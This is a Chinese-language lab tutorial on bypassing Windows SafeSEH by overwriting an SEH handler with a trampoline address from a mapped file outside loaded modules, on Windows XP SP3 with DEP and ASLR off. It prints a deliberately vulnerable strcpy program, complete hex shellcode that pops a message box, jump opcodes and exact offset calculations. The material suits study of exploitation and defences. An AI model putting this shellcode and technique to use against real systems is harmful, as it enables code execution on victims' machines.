利用加载模块之外的地址绕过safeSEH
前言:文章涉及的概念在之前的文章中都有过详细的讲解
⑴. 原理分析:
当程序加载进内存中后,处理PE文件(exe,dll),还有一些映射文件,safeSEH是不会对这些映射文件做安全检查。所以如果在这些映射文件中找到一些跳板地址(意义见之前的绕过利用/GS机制),就可以达到控制EIP的目的,执行恶意代码。
如上图,可以看到在PE文件之前有很多map(映射文件),safeSEH是不会对这些文件做安全检测的。
⑵.环境准备:
i.实验代码:
#include "stdafx.h"
#include <string.h>
#include <windows.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xE9\x2B\xFF\xFF\xFF\x90\x90\x90"// machine code of far jump and \x90
"\xEB\xF6\x90\x90"// machine code of short jump and \x90
"\x0B\x0B\x29\x00"// address of call [ebp+30] in outside memory
;
DWORD MyException(void)
{
printf("There is an exception");
getchar();
return 1;
}
void test(char * input)
{
char str[200];
strcpy(str,input);
int zero=0;
__try
{
zero=1/zero;
}
__except(MyException())
{
}
}
int _tmain(int argc, _TCHAR* argv[])
{
//__asm int 3
test(shellcode);
return 0;
}
ii.测试环境:
测试平台:window xp with sp3(win7 上找不到可以利用的map文件)。
编译环境:
DEP,ASLR保护机制关闭。
⑶.调试分析:
i.程序执行到test函数,参数入栈,call test函数:
Shellcode地址0x0012ff78
Eip:0x0012ff74
ii.初始化test哈数,Ebp:0x0012ff70:
iii.异常处理函数指针入栈,
FS:[0]指针 = 0x0012ff60
异常处理函数指针 = 0x0012ff64
iv.缓冲区起始地址 = 0x0012fe88
⑷.攻击过程:
i.确定shellcode大小:
回顾,攻击思路,我们是希望将异常处理函数的指针覆盖成恶意代码(弹出对话框)的指针,那么,
Size(shellcode) =最近的异常处理函数指针–缓冲区起始地址 + 4 = 220(十进制)。
ii.生成恶意代码(弹出对话框):
这里偷个懒,就直接用网上的恶意代码了,长度是168字节,效果是糖醋对话框。
iii.跳板地址
问题:我们以前的跳板都是从栈低地址向栈高地址条的,而这一次,我们的恶意代码的起始地址是小于异常处理函数的,那么之前一直用的PPR跳板就不能用了,这要怎么办?
这就要考虑到SEH处理机制了,到异常处理函数不能处理异常时,会怎么办?异常会局部展开,调用SEH链的指针,寻找下一个异常处理节点,处理异常。
好,我们这里寻找可以实现这个目标的指令地址。
使用OllyFindaddr插件,寻找call [ebp+n]指令,得到下图:
红色的一行显示,该指令不在已加载的模块中,
指令地址 = 0x00290b0b
iv.使EIP指向恶意代码执行指针
控制EIP之后,我们要让EIP跳到恶意代码执行处,四字节的长度不能实现一个长条,只能先用一个短跳跳到长跳地址,在由长跳跳跳到恶意代码执行处。
短跳机器码:EB 一字节的距离 \x90\x90
长跳机器码:E9 四字节的距离 \x90\x90\x90
v.跳转距离计算
跳转距离 =目的地址–跳转指令起始地址– 跳转指令长度(单位:字节)
短跳距离 = 0x0012ff5c – 0x0012ff60 – 2 = F6(起始地址 – 目的地址是负数要取补码)。
长跳距离 = 0x0012fe88 – 0x0012ff5c – 5 = FFFFFF2b
短跳指令:\xEB\xf6\x90\x90
长跳指令:\xe9\x2b\xff\xff\xff\x90\x90\x90
vi.设计shellcode结构
恶意代码(弹对话框) 168字节 |
填充物 40字节 |
长跳指令 8字节 |
短跳指令 4字节 |
跳板指令 4字节 |
栈低地址 栈高地址
vi.执行攻击
成功。